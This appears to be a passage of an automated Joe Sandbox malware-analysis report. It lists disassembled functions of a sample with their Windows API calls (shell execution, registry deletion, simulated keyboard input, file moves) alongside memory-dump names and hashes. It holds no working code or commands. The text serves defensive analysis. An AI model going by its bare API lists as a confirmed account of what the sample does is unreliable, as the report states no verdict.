                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d255e691ca89a2d14e2e011879c0af9915c521e751aa38eee3e7b91086e5e51e
                          • Instruction ID: 4ddf10a6c7bce9cd0a03f2f59a0211d32448f451169bcb36a8e0a43362972c89
                          • Opcode Fuzzy Hash: d255e691ca89a2d14e2e011879c0af9915c521e751aa38eee3e7b91086e5e51e
                          • Instruction Fuzzy Hash: C3713871900109EFDB04CF98C889EFEBBB5FF89314F64C199F915AA291C7349A81CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5B250 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 197COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • CoInitialize.OLE32 ref: 00B5B298
                          • VariantInit.OLEAUT32(?), ref: 00B5B410
                          • VariantClear.OLEAUT32(?), ref: 00B5B471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Variant$ClearInitInitialize__itow__swprintf
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 4106155388-1287834457
                          • Opcode ID: f6feec0a6231872ca730e9147c741a4038bf931b3e96dfa3e5754ca1ac3fd306
                          • Instruction ID: d564fd23157d955ab95a0cfec3a37117158bc72575e727beded7f3b97fbb10b9
                          • Opcode Fuzzy Hash: f6feec0a6231872ca730e9147c741a4038bf931b3e96dfa3e5754ca1ac3fd306
                          • Instruction Fuzzy Hash: 1F618730204201AFD710DF54C885F6EBBE8EF88715F1448D9F985AB2A1C770EE49CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B62121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B6214B
                          • _memset.LIBCMT ref: 00B62214
                          • ShellExecuteExW.SHELL32(?), ref: 00B62259
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                            • Part of subcall function 00B03BCF: _wcscpy.LIBCMT ref: 00B03BF2
                          • CloseHandle.KERNEL32(00000000), ref: 00B62320
                          • FreeLibrary.KERNEL32(00000000), ref: 00B6232F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                          • String ID: @
                          • API String ID: 4082843840-2766056989
                          • Opcode ID: 4d1c174cb3daa46814366f6c0d0d6f58448d607ecc852cbafc1aa65ac14abe97
                          • Instruction ID: 6eb8394ab0c273cfc361a6efca8efb14a617e6d58d7049b35eaff216527411f9
                          • Opcode Fuzzy Hash: 4d1c174cb3daa46814366f6c0d0d6f58448d607ecc852cbafc1aa65ac14abe97
                          • Instruction Fuzzy Hash: 80719C74A00619DFDF04EFA4C8959AEBBF5FF48310F148099E849AB391DB34AE40CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B447DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 00B4481D
                          • GetKeyboardState.USER32(?), ref: 00B44832
                          • SetKeyboardState.USER32(?), ref: 00B44893
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B448C1
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B448E0
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B44926
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B44949
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: dc6ad4e7f756f902fa08d39072a1745e70b4eba08b0a703f9dc5bcf686e94d32
                          • Instruction ID: bcc5b5400691ca0fa46ebfbbb219705de88293823d9101d286ba69e0fa3e5751
                          • Opcode Fuzzy Hash: dc6ad4e7f756f902fa08d39072a1745e70b4eba08b0a703f9dc5bcf686e94d32
                          • Instruction Fuzzy Hash: 5951D3A05087D53DFB3642248C45BBBBFE99B06304F0885C9E1D5568C2C7E4EEA8F750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B445F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(00000000), ref: 00B44638
                          • GetKeyboardState.USER32(?), ref: 00B4464D
                          • SetKeyboardState.USER32(?), ref: 00B446AE
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B446DA
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B446F7
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B4473B
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B4475C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 9c10476db1cdfac186db152b901ef6cc1fdfced3735fb9feaa1ff03e8809bf57
                          • Instruction ID: 823e5f53faf4f8acb6ad3d5d1f1fd1cb2ba3d81e255344f5de9754ddbf9bb1e5
                          • Opcode Fuzzy Hash: 9c10476db1cdfac186db152b901ef6cc1fdfced3735fb9feaa1ff03e8809bf57
                          • Instruction Fuzzy Hash: 0651E3A06047D63DFB3687248C45BB6BFE9EB06304F0884C9E1D4468C2D7A4EEA9F751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B486AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcsncpy$LocalTime
                          • String ID:
                          • API String ID: 2945705084-0
                          • Opcode ID: c56a89769771742ba86958b6a8f9f138833bb9c03b799fcd1707895f9408b8f5
                          • Instruction ID: 6441113bc9fb41ce497e89203108a051f0d52bf5c234b4c459f792933531ba14
                          • Opcode Fuzzy Hash: c56a89769771742ba86958b6a8f9f138833bb9c03b799fcd1707895f9408b8f5
                          • Instruction Fuzzy Hash: 3C412E65C10224B5CF11EBF8D886ACFB7ECEF15310F9088A6E558F7121EA30E655C7A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B69D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B69DB0
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B69E57
                          • IsMenu.USER32(?), ref: 00B69E6F
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B69EB7
                          • DrawMenuBar.USER32 ref: 00B69ED0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Menu$Item$DrawInfoInsert_memset
                          • String ID: 0
                          • API String ID: 3866635326-4108050209
                          • Opcode ID: 9fda03462ba267b10cd01b8dec818a5213fc1b7d27bb9751298316d68890321b
                          • Instruction ID: 6cf8013b90b85f3a61ad5f95b07f0f78120a187ea6ea0f037cb0738638a843ba
                          • Opcode Fuzzy Hash: 9fda03462ba267b10cd01b8dec818a5213fc1b7d27bb9751298316d68890321b
                          • Instruction Fuzzy Hash: 83414975A01209EFDB20DF54D884EDABBF8FF09364F0484AAE909A7251D735ED58CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B63C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00B63C92
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B63CBC
                          • FreeLibrary.KERNEL32(00000000), ref: 00B63D71
                            • Part of subcall function 00B63C63: RegCloseKey.ADVAPI32(?), ref: 00B63CD9
                            • Part of subcall function 00B63C63: FreeLibrary.KERNEL32(?), ref: 00B63D2B
                            • Part of subcall function 00B63C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B63D4E
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B63D16
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                          • String ID:
                          • API String ID: 395352322-0
                          • Opcode ID: eea196fc28f9bba8b46bc9f82a652c3d66ef7fa9e8e22dac5f8883c0a6213b29
                          • Instruction ID: 714685e4ac581b561bfb1d14f8fea6ed67c28f682271b819622dd0e08ccc2386
                          • Opcode Fuzzy Hash: eea196fc28f9bba8b46bc9f82a652c3d66ef7fa9e8e22dac5f8883c0a6213b29
                          • Instruction Fuzzy Hash: 93310871901209BFDB159B94DC99EFEB7FCEF09700F1005BAE512A2190DA749F89DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B68DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B68DF4
                          • GetWindowLongW.USER32(014BACA0,000000F0), ref: 00B68E27
                          • GetWindowLongW.USER32(014BACA0,000000F0), ref: 00B68E5C
                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B68E8E
                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B68EB8
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B68EC9
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B68EE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: 2c4b28869c6d5331250837f8f84787f7d5d072c046878161ac754c18192036d0
                          • Instruction ID: 03a735c7db4173c188a57ec9319b44ae9a9352e8c18bfc0df76d6ef331744a63
                          • Opcode Fuzzy Hash: 2c4b28869c6d5331250837f8f84787f7d5d072c046878161ac754c18192036d0
                          • Instruction Fuzzy Hash: CA311E31644214EFEB20DF58EC84FA537E5FB4A724F1942A9F5059B2B2CF76A840DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B469F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00B031DA
                          • lstrcmpiW.KERNEL32(?,?), ref: 00B46A2B
                          • _wcscmp.LIBCMT ref: 00B46A49
                          • MoveFileW.KERNEL32(?,?), ref: 00B46A62
                            • Part of subcall function 00B46D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00B46DBA
                            • Part of subcall function 00B46D6D: GetLastError.KERNEL32 ref: 00B46DC5
                            • Part of subcall function 00B46D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00B46DD9
                          • _wcscat.LIBCMT ref: 00B46AA4
                          • SHFileOperationW.SHELL32(?), ref: 00B46B0C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                          • String ID: \*.*
                          • API String ID: 2323102230-1173974218
                          • Opcode ID: 5249af6d56911cf0065495214e6b4909816f5ab625a3cef83e79e4ee01d22abb
                          • Instruction ID: 9d2458900f6e9c5b5de041a026bf2eff0bed7df162f2ad6ab15dd19bde011832
                          • Opcode Fuzzy Hash: 5249af6d56911cf0065495214e6b4909816f5ab625a3cef83e79e4ee01d22abb
                          • Instruction Fuzzy Hash: F53141B1900218AACF60EFA4E845BDDB7F8AF19300F5055EAE509E3151EB309B89CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B1C657
                            • Part of subcall function 00B1C619: GetStockObject.GDI32(00000011), ref: 00B1C66B
                            • Part of subcall function 00B1C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1C675
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B6A13B
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B6A148
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B6A153
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B6A162
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B6A16E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: 2516bf6ca2c1e3f1233a8bacdf4419f548ee3068900a71858028d14df6073d8e
                          • Instruction ID: 26207994e8278cce0f51200479e27549161e6e3caaea26730b8b7fca1d8cbad7
                          • Opcode Fuzzy Hash: 2516bf6ca2c1e3f1233a8bacdf4419f548ee3068900a71858028d14df6073d8e
                          • Instruction Fuzzy Hash: D61182B115021DBEEF115F65CC86EE7BF9DEF09798F014215FA08A70A1CA769C21DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B24C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                          Download Yara Rule
                          APIs
                          • __getptd_noexit.LIBCMT ref: 00B24C3E
                            • Part of subcall function 00B286B5: GetLastError.KERNEL32(?,00B20127,00B288A3,00B24673,?,?,00B20127,?,00B0125D,00000058,?,?), ref: 00B286B7
                            • Part of subcall function 00B286B5: __calloc_crt.LIBCMT ref: 00B286D8
                            • Part of subcall function 00B286B5: GetCurrentThreadId.KERNEL32 ref: 00B28701
                            • Part of subcall function 00B286B5: SetLastError.KERNEL32(00000000,00B20127,00B288A3,00B24673,?,?,00B20127,?,00B0125D,00000058,?,?), ref: 00B28719
                          • CloseHandle.KERNEL32(?,?,00B24C1D), ref: 00B24C52
                          • __freeptd.LIBCMT ref: 00B24C59
                          • RtlExitUserThread.NTDLL(00000000,?,00B24C1D), ref: 00B24C61
                          • GetLastError.KERNEL32(?,?,00B24C1D), ref: 00B24C91
                          • RtlExitUserThread.NTDLL(00000000,?,?,00B24C1D), ref: 00B24C98
                          • __freefls@4.LIBCMT ref: 00B24CB4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                          • String ID:
                          • API String ID: 1445074172-0
                          • Opcode ID: 1fb8f47184db0b6ba5bbda922b26c010e316755707146cf785353efd42b79b4c
                          • Instruction ID: 7972e013f548b3a6fd5808f9716d09346e6df38673f28f62555e804562213e1c
                          • Opcode Fuzzy Hash: 1fb8f47184db0b6ba5bbda922b26c010e316755707146cf785353efd42b79b4c
                          • Instruction Fuzzy Hash: B201DF70802721AFC719BBB8F90990D7BE5EF183157108599F50D9B6A2EF35D842CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 00B1C6C0
                          • GetWindowRect.USER32(?,?), ref: 00B1C701
                          • ScreenToClient.USER32(?,000000FF), ref: 00B1C729
                          • GetClientRect.USER32(?,?), ref: 00B1C856
                          • GetWindowRect.USER32(?,?), ref: 00B1C86F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Rect$Client$Window$Screen
                          • String ID:
                          • API String ID: 1296646539-0
                          • Opcode ID: fa85a6cb5455a0561dc390969059d5ae36941b11e2c85047eddc1da7cd20fb02
                          • Instruction ID: e82f4e56a2c7d80a12d1b9b3953900108392b661bfc133065de2fb48af8874f3
                          • Opcode Fuzzy Hash: fa85a6cb5455a0561dc390969059d5ae36941b11e2c85047eddc1da7cd20fb02
                          • Instruction Fuzzy Hash: 15B12A79900249DBDB10CFA8C5807EDBBF1FF08310F5495AAEC69AB654DB70A980CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B49569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
